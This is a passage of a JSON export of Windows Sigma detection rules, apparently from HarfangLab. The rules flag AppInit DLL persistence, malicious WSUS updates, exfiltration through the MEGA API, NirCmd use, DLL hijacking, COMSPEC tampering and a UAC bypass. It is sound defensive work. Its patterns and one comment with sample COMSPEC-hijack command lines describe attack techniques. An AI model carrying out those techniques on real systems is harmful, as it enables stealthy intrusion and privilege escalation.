'?:\\Windows\\System32\\DriverStore\\FileRepository\\\\*\\Display.NvContainer\\NVDisplay.Container.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'NVIDIA Corporation'\n\n exclusion_nvidia_loadappInit:\n TargetObject|endswith: '\\LoadAppInit_DLLs'\n Image:\n - '?:\\Windows\\System32\\nvvsvc.exe'\n - '?:\\Program Files\\NVIDIA Corporation\\Display.NvContainer\\NVDisplay.Container.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'NVIDIA Corporation'\n\n exclusion_sophos_appinit:\n TargetObject|endswith: '\\AppInit_DLLs'\n Details:\n - '?:\\Windows\\SysWOW64\\SophosAV\\SOPHOS~?.DLL'\n - '?:\\WINDOWS\\system32\\SophosAV\\SOPHOS~?.DLL'\n - '?:\\PROGRA~?\\Sophos\\SOPHOS~?\\SOPHOS~?.DLL'\n - '?:\\PROGRA~?\\Citrix\\System32\\mfaphook64.dll,?:\\Windows\\system32\\SophosAV\\SOPHOS~?.DLL'\n - '?:\\PROGRA~?\\Citrix\\System32\\mfaphook.dll,?:\\Windows\\SysWOW64\\SophosAV\\SOPHOS~?.DLL'\n - '?:\\Windows\\System32\\SophosAV\\sophos_detoured_x64.dll'\n - '?:\\PROGRA~?\\Sophos\\SOPHOS~?\\SOPHOS~?.DLL,?:\\PROGRA~?\\Sophos\\SOPHOS~?\\\\?SOPHOS~?.DLL'\n - '?:\\PROGRA~?\\Sophos\\SOPHOS~?\\\\?SOPHOS~?.DLL'\n\n exclusion_sophos_loadappinit:\n TargetObject|endswith: '\\LoadAppInit_DLLs'\n Image:\n - '?:\\ProgramData\\Sophos\\AutoUpdate\\Cache\\sophos_autoupdate?.dir\\ALUpdate.exe'\n - '?:\\ProgramData\\Sophos\\AutoUpdate\\Cache\\sophos_autoupdate?.dir\\su-setup32.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Sophos Limited'\n - 'Sophos Ltd'\n\n exclusion_appsense:\n TargetObject|endswith: '\\AppInit_DLLs'\n Image: '?:\\Program Files\\AppSense\\Environment Manager\\Agent\\EmCoreService.exe'\n\n # Equitrac Office Client\n exclusion_equitrac:\n TargetObject|endswith: '\\AppInit_DLLs'\n Image: '?:\\Windows\\System32\\msiexec.exe'\n Details: 'EQPortMonitorSpy.dll'\n\n exclusion_msi_install_loadappinit:\n TargetObject|endswith: '\\LoadAppInit_DLLs'\n Details: 'DWORD (0x00000001)'\n ProcessCommandLine:\n - '?:\\Windows\\syswow64\\MsiExec.exe -Embedding * E Global\\MSI0000'\n - '?:\\Windows\\system32\\MsiExec.exe -Embedding * E Global\\MSI0000'\n ProcessParentCommandLine: '?:\\WINDOWS\\system32\\msiexec.exe /V'\n\n exclusion_nvidia_hp:\n TargetObject|endswith: '\\AppInit_DLLs'\n ProcessImage|contains: '\\Display.NvContainer\\NVDisplay.Container.exe'\n Details:\n - '?:\\PROGRA~?\\HP\\SURECL~?\\servers\\BemHook32.dll'\n - '?:\\PROGRA~?\\HP\\SURECL~?\\servers\\BemHook.dll'\n\n exclusion_citrix:\n TargetObject|endswith: '\\AppInit_DLLs'\n Details:\n - '?:\\PROGRA~?\\Citrix\\System32\\mfaphook64.dll'\n - '?:\\PROGRA~?\\Citrix\\System32\\mfaphook.dll'\n - '?:\\progra~?\\citrix\\system32\\radeaphook.dll'\n - '?:\\progra~?\\citrix\\system32\\radeaphook64.dll'\n\n exclusion_setupplatform:\n TargetObject|endswith: '\\AppInit_DLLs'\n ProcessImage: '?:\\$WINDOWS.~BT\\Sources\\setupplatform.exe'\n\n exclusion_greenprint:\n # ce0cd8e9ad34b85bd164a60a4a5de5cee895353d8520cf14923399d1001aa3e1\n Details: '?:\\Progra~?\\Greenp~?\\gphknt32.dll'\n\n exclusion_altiris:\n - ProcessImage: '?:\\Program Files\\Altiris\\Altiris Agent\\AeXNSAgent.exe'\n TargetObject:\n - 'HKLM\\software\\microsoft\\windows nt\\currentversion\\windows\\loadappinit_dlls'\n - 'HKLM\\software\\wow6432node\\microsoft\\windows nt\\currentversion\\windows\\loadappinit_dlls'\n Details: 'DWORD (0x00000001)'\n - ProcessImage: '?:\\Program Files\\Altiris\\Altiris Agent\\AeXNSAgent.exe'\n TargetObject:\n - 'HKLM\\software\\microsoft\\windows nt\\currentversion\\windows\\appinit_dlls'\n - 'HKLM\\software\\wow6432node\\microsoft\\windows nt\\currentversion\\windows\\appinit_dlls'\n Details:\n - 'aminit64.dll'\n - 'aminit32.dll'\n\n exclusion_virtualdesktop:\n ProcessImage: '?:\\Windows\\System32\\msiexec.exe'\n Details: '?:\\PROGRA~?\\VIRTUA~?\\VIRTUA~?.DLL'\n\n exclusion_systrack:\n ProcessImage: '?:\\Program Files (x86)\\SysTrack\\LsiAgent\\LsiAgent.exe'\n\n condition: selection_registry and ((selection_loadappinit and not filter_loadappinit) or 1 of selection_key_*) and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "1dff2e4d-9edd-4b48-af83-6c559ea3e9c5",
"rule_name": "Registry AppInit DLLs Modified",
"rule_description": "Detects the modification of the AppInit_DLLs or LoadAppInit_DLLs keys in registry.\nAttackers may establish persistence by loading malicious libraries (DLL) via AppInit DLLs.\nThis functionality allows custom libraries (DLL) to be loaded into the address space of every process that loads user32.dll.\nIt is recommended to analyze the process responsible for the registry and the library pointed to by the registry value to look for malicious content or actions.\n",
"rule_creation_date": "2020-09-24",
"rule_modified_date": "2025-05-19",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1112",
"attack.t1546.010"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "1e085ad6-7f93-463c-9238-b75582736135",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.072911Z",
"creation_date": "2026-03-23T11:45:34.072913Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.072918Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/nettitude/SharpWSUS",
"https://github.com/ThunderGunExpress/Thunder_Woosus",
"https://github.com/AlsidOfficial/WSUSpendu",
"https://attack.mitre.org/techniques/T1210/"
],
"name": "t1210_potential_malicious_update_through_wsus.yml",
"content": "title: Possible Malicious Update via WSUS\nid: 1e085ad6-7f93-463c-9238-b75582736135\ndescription: |\n Detects the installation of updates with an unusual name or associated with malicious tools exploiting WSUS (Windows Server Update Services).\n Attackers can use WSUS to launch malicious payloads disguised as Windows Updates.\n This technique can be used for lateral movement.\n It is recommended to analyze the content of the update package, to investigate the source of the update and to look for signs of malicious actions on the IT's WSUS server.\nreferences:\n - https://github.com/nettitude/SharpWSUS\n - https://github.com/ThunderGunExpress/Thunder_Woosus\n - https://github.com/AlsidOfficial/WSUSpendu\n - https://attack.mitre.org/techniques/T1210/\ndate: 2022/11/16\nmodified: 2025/03/07\nauthor: HarfangLab\ntags:\n - attack.lateral_movement\n - attack.t1210\n - classification.Windows.Source.EventLog\n - classification.Windows.Behavior.Exploitation\n - classification.Windows.Behavior.Lateralization\nlogsource:\n product: windows\n service: system\ndetection:\n selection:\n EventID: 19 # Successful update\n Source: Microsoft-Windows-WindowsUpdateClient\n updateTitle|contains:\n - 'SharpWSUS'\n - 'Probably-legal-update'\n - 'Bundle update for \\* Windows (from KB2862335)'\n - 'Bundle Security Update for \\* Windows (from KB2862335)'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "1e085ad6-7f93-463c-9238-b75582736135",
"rule_name": "Possible Malicious Update via WSUS",
"rule_description": "Detects the installation of updates with an unusual name or associated with malicious tools exploiting WSUS (Windows Server Update Services).\nAttackers can use WSUS to launch malicious payloads disguised as Windows Updates.\nThis technique can be used for lateral movement.\nIt is recommended to analyze the content of the update package, to investigate the source of the update and to look for signs of malicious actions on the IT's WSUS server.\n",
"rule_creation_date": "2022-11-16",
"rule_modified_date": "2025-03-07",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.lateral_movement"
],
"rule_technique_tags": [
"attack.t1210"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "1eb11fe6-9630-4058-bdec-67f5cde7cb1a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.091788Z",
"creation_date": "2026-03-23T11:45:34.091790Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.091794Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.microsoft.com/en-us/security/blog/2023/07/06/the-five-day-job-a-blackbyte-ransomware-intrusion-case-study/",
"https://thedfirreport.com/2024/01/29/buzzing-on-christmas-eve-trigona-ransomware-in-3-hours/",
"https://attack.mitre.org/techniques/T1071/001/"
],
"name": "t1567_002_suspicious_url_request_to_mega.yml",
"content": "title: Suspicious URL Request to the MEGA API\nid: 1eb11fe6-9630-4058-bdec-67f5cde7cb1a\ndescription: |\n Detects suspicious URL requests to the file sharing service MEGA.\n Adversaries can use legitimate sharing services to exfiltrate data or to download malicious files.\n The BlackByte ransomware is known to use the MEGA API to exfiltrate data via a specific tool named ExByte.\n It is recommended to investigate the source of these URL requests and analyze the process responsible for accessing MEGA.\n Additionally, review alerts and try to analyze the downloaded file.\nreferences:\n - https://www.microsoft.com/en-us/security/blog/2023/07/06/the-five-day-job-a-blackbyte-ransomware-intrusion-case-study/\n - https://thedfirreport.com/2024/01/29/buzzing-on-christmas-eve-trigona-ransomware-in-3-hours/\n - https://attack.mitre.org/techniques/T1071/001/\ndate: 2023/07/17\nmodified: 2025/02/04\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1102.002\n - attack.exfiltration\n - attack.t1567.002\n - attack.t1537\n - classification.Windows.Source.UrlRequest\n - classification.Windows.Behavior.Exfiltration\n - classification.Windows.Behavior.FileDownload\nlogsource:\n product: windows\n category: url_request\ndetection:\n selection:\n RequestUrlHost: 'g.api.mega.co.nz'\n\n filter_mega:\n ProcessSigned: 'true'\n ProcessSignature: 'Mega Limited'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "1eb11fe6-9630-4058-bdec-67f5cde7cb1a",
"rule_name": "Suspicious URL Request to the MEGA API",
"rule_description": "Detects suspicious URL requests to the file sharing service MEGA.\nAdversaries can use legitimate sharing services to exfiltrate data or to download malicious files.\nThe BlackByte ransomware is known to use the MEGA API to exfiltrate data via a specific tool named ExByte.\nIt is recommended to investigate the source of these URL requests and analyze the process responsible for accessing MEGA.\nAdditionally, review alerts and try to analyze the downloaded file.\n",
"rule_creation_date": "2023-07-17",
"rule_modified_date": "2025-02-04",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.exfiltration"
],
"rule_technique_tags": [
"attack.t1102.002",
"attack.t1537",
"attack.t1567.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "1ecc91f4-bed7-4cec-b236-f7b943f95289",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:35.295810Z",
"creation_date": "2026-03-23T11:45:35.295814Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.295820Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://twitter.com/1ZRR4H/status/1575364101148114944",
"https://www.nirsoft.net/utils/nircmd.html",
"https://attack.mitre.org/techniques/T1059/"
],
"name": "t1059_execution_of_nircmd.yml",
"content": "title: NirCmd Execution\nid: 1ecc91f4-bed7-4cec-b236-f7b943f95289\ndescription: |\n Detects the execution of the NirCmd.\n NirCmd is a command-line utility allowing users to perform useful tasks, such as updating registry keys, executing commands, updating network configuration, editing files, etc.\n It can also be used by attackers to execute commands while evading defenses.\n It is recommended to investigate the actions that were performed by NirCmd as well as NirCmd's execution context to determine its legitimacy.\nreferences:\n - https://twitter.com/1ZRR4H/status/1575364101148114944\n - https://www.nirsoft.net/utils/nircmd.html\n - https://attack.mitre.org/techniques/T1059/\ndate: 2022/11/03\nmodified: 2026/02/16\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059\n - attack.defense_evasion\n - attack.t1218\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Tool.NirCmd\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_binary:\n - OriginalFileName: 'nircmd.exe'\n - Image|endswith: '\\nircmd.exe'\n\n selection_path:\n - Image:\n - '?:\\nircmd.exe'\n # AtomicRedTeam\n - '*\\ExternalPayloads\\nircmd.exe'\n - Image|startswith:\n - '?:\\windows\\'\n - '?:\\ProgramData\\'\n - '?:\\PerfLogs\\'\n - '?:\\temp\\'\n - '?:\\users\\'\n - '?:\\\\?Recycle.Bin\\'\n\n # This is handled in the rule ad9a4851-d601-4528-a0d2-a3d77b050741\n filter_suspicious_commandline:\n CommandLine|contains:\n - ' elevatecmd '\n - ' execmd '\n - ' exec '\n - ' exec2 '\n - ' runassystem '\n - ' service '\n - ' savescreenshot '\n - ' savescreenshotfull '\n\n exclusion_commandline:\n CommandLine: '*\\nircmd.exe setsysvolume *'\n\n exclusion_mpladmin:\n ParentImage|endswith: '\\MPLAdmin.exe'\n\n # https://www.dicomizer.com/\n exclusion_modalizer:\n - CommandLine:\n - 'nircmd win close ititle OBS'\n - 'nircmd win close ititle capture'\n # nircmd convertimages c:\\videocapture\\capture\\*.png .jpg\n - 'nircmd convertimages ?:\\videocapture\\capture\\\\*'\n # nircmd win setsize title capture 980 90 390 650\n - 'nircmd win setsize title capture *'\n - ParentCommandLine: '?:\\WINDOWS\\system32\\cmd.exe /c ?:\\videocapture\\\\*\\\\*.bat'\n\n exclusion_westerndigital:\n ParentImage: '?:\\Program Files (x86)\\Western Digital\\Discovery\\Current\\WD Discovery.exe'\n\n exclusion_medinbox:\n ParentCommandLine: '?:\\WINDOWS\\system32\\cmd.exe /c ?:\\\\*\\Medinbox\\Medinbox.Launcher\\Medinbox.Launcher.bat'\n\n exclusion_openwhispr:\n Image|endswith: '\\resources\\bin\\nircmd.exe'\n ProcessParentProduct: 'OpenWhispr'\n ProcessParentCompany: 'OpenWhispr Team'\n\n condition: all of selection_* and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "1ecc91f4-bed7-4cec-b236-f7b943f95289",
"rule_name": "NirCmd Execution",
"rule_description": "Detects the execution of the NirCmd.\nNirCmd is a command-line utility allowing users to perform useful tasks, such as updating registry keys, executing commands, updating network configuration, editing files, etc.\nIt can also be used by attackers to execute commands while evading defenses.\nIt is recommended to investigate the actions that were performed by NirCmd as well as NirCmd's execution context to determine its legitimacy.\n",
"rule_creation_date": "2022-11-03",
"rule_modified_date": "2026-02-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059",
"attack.t1218"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "1ee1a6bd-bf16-4c3b-b9a0-65061ba1dbdc",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.602126Z",
"creation_date": "2026-03-23T11:45:34.602129Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.602137Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_setupugc.yml",
"content": "title: DLL Hijacking via setupugc.exe\nid: 1ee1a6bd-bf16-4c3b-b9a0-65061ba1dbdc\ndescription: |\n Detects potential Windows DLL Hijacking via setupugc.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'setupugc.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\dbgcore.DLL'\n - '\\dbghelp.dll'\n - '\\DNSAPI.dll'\n - '\\mpr.dll'\n - '\\WDSCORE.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "1ee1a6bd-bf16-4c3b-b9a0-65061ba1dbdc",
"rule_name": "DLL Hijacking via setupugc.exe",
"rule_description": "Detects potential Windows DLL Hijacking via setupugc.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "1f00e764-5dc8-4df8-a8d7-2e11b24a7e76",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.080239Z",
"creation_date": "2026-03-23T11:45:34.080241Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.080245Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/guardicore/monkey/blob/59e7ac34f70536e104d848a1610f07aacf2f012e/monkey/infection_monkey/post_breach/signed_script_proxy/windows/signed_script_proxy.py",
"https://attack.mitre.org/techniques/T1216/"
],
"name": "t1216_cmd_comspec_tampering.yml",
"content": "title: COMSPEC Tampered via cmd.exe\nid: 1f00e764-5dc8-4df8-a8d7-2e11b24a7e76\ndescription: |\n Detects a tampering of the COMSPEC environment variable in cmd.exe command-line.\n This can be used to perform a signed script proxy execution and takeover control of a legitimate script.\n It is recommended to investigate the binary pointed to by the path in the COMSPEC variable and other actions taken by the parent process to determine whether this action was legitimate.\nreferences:\n - https://github.com/guardicore/monkey/blob/59e7ac34f70536e104d848a1610f07aacf2f012e/monkey/infection_monkey/post_breach/signed_script_proxy/windows/signed_script_proxy.py\n - https://attack.mitre.org/techniques/T1216/\ndate: 2022/01/21\nmodified: 2025/01/28\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1216\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.ProxyExecution\nlogsource:\n category: process_creation\n product: windows\ndetection:\n # C:\\Windows\\system32\\cmd.exe /c set comspec=C:\\Windows\\system32\\T1216_random_executable.exe && cscript C:\\Windows\\System32\\manage-bde.wsf\n # C:\\Windows\\system32\\cmd.exe /c set comspec=C:\\Windows\\system32\\cmd.exe\n # $env:comspec=C:\\Windows\\system32\\calc.exe; cscript C:\\Windows\\System32\\manage-bde.wsf\n selection_1:\n - Image|endswith: '\\cmd.exe'\n # Renamed binaries\n - OriginalFileName: 'Cmd.EXE'\n selection_2:\n CommandLine|contains|all:\n - '/c '\n - 'set'\n - ' comspec='\n\n condition: all of selection_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "1f00e764-5dc8-4df8-a8d7-2e11b24a7e76",
"rule_name": "COMSPEC Tampered via cmd.exe",
"rule_description": "Detects a tampering of the COMSPEC environment variable in cmd.exe command-line.\nThis can be used to perform a signed script proxy execution and takeover control of a legitimate script.\nIt is recommended to investigate the binary pointed to by the path in the COMSPEC variable and other actions taken by the parent process to determine whether this action was legitimate.\n",
"rule_creation_date": "2022-01-21",
"rule_modified_date": "2025-01-28",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1216"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "1f520703-a22a-4e93-8e0f-30cd3c1272f1",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.074233Z",
"creation_date": "2026-03-23T11:45:34.074235Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.074239Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/hfiref0x/UACME"
],
"name": "t1548_002_uac_bypass_credwiz.yml",
"content": "title: UAC Bypass Executed via credwiz\nid: 1f520703-a22a-4e93-8e0f-30cd3c1272f1\ndescription: |\n Detects an UAC bypass via credwiz.exe.\n This alert triggers on credwiz.exe or oobe.exe loading a netutils.dll which is not signed by Microsoft.\n Adversaries may bypass UAC mechanisms to elevate process privileges on system.\n Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\n It is recommended to analyze the process and user session responsible to look for malicious content or actions.\nreferences:\n - https://github.com/hfiref0x/UACME\ndate: 2021/01/06\nmodified: 2025/02/19\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1574.001\n - attack.t1548.002\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.PrivilegeEscalation\n - classification.Windows.Behavior.UACBypass\n - classification.Windows.Behavior.DLLHijacking\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection_standard_hijack:\n Image: '?:\\Windows\\System32\\credwiz.exe'\n ImageLoaded|endswith: '\\netutils.dll'\n\n selection_renamed_hijack:\n Image: '?:\\Windows\\System32\\wbem\\oobe.exe'\n ImageLoaded|endswith: '\\netutils.dll'\n\n filter_signed:\n Signed: 'true'\n Signature:\n - 'Microsoft Windows'\n - 'Microsoft Windows Publisher'\n - 'Microsoft Corporation'\n\n condition: 1 of selection_* and not 1 of filter_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "1f520703-a22a-4e93-8e0f-30cd3c1272f1",
"rule_name": "UAC Bypass Executed via credwiz",
"rule_description": "Detects an UAC bypass via credwiz.exe.\nThis alert triggers on credwiz.exe or oobe.exe loading a netutils.dll which is not signed by Microsoft.\nAdversaries may bypass UAC mechanisms to elevate process privileges on system.\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\nIt is recommended to analyze the process and user session responsible to look for malicious content or actions.\n",
"rule_creation_date": "2021-01-06",
"rule_modified_date": "2025-02-19",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1548.002",
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "1f5a2648-0258-4ffe-93b8-f4aa01a21d2c",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.615245Z",
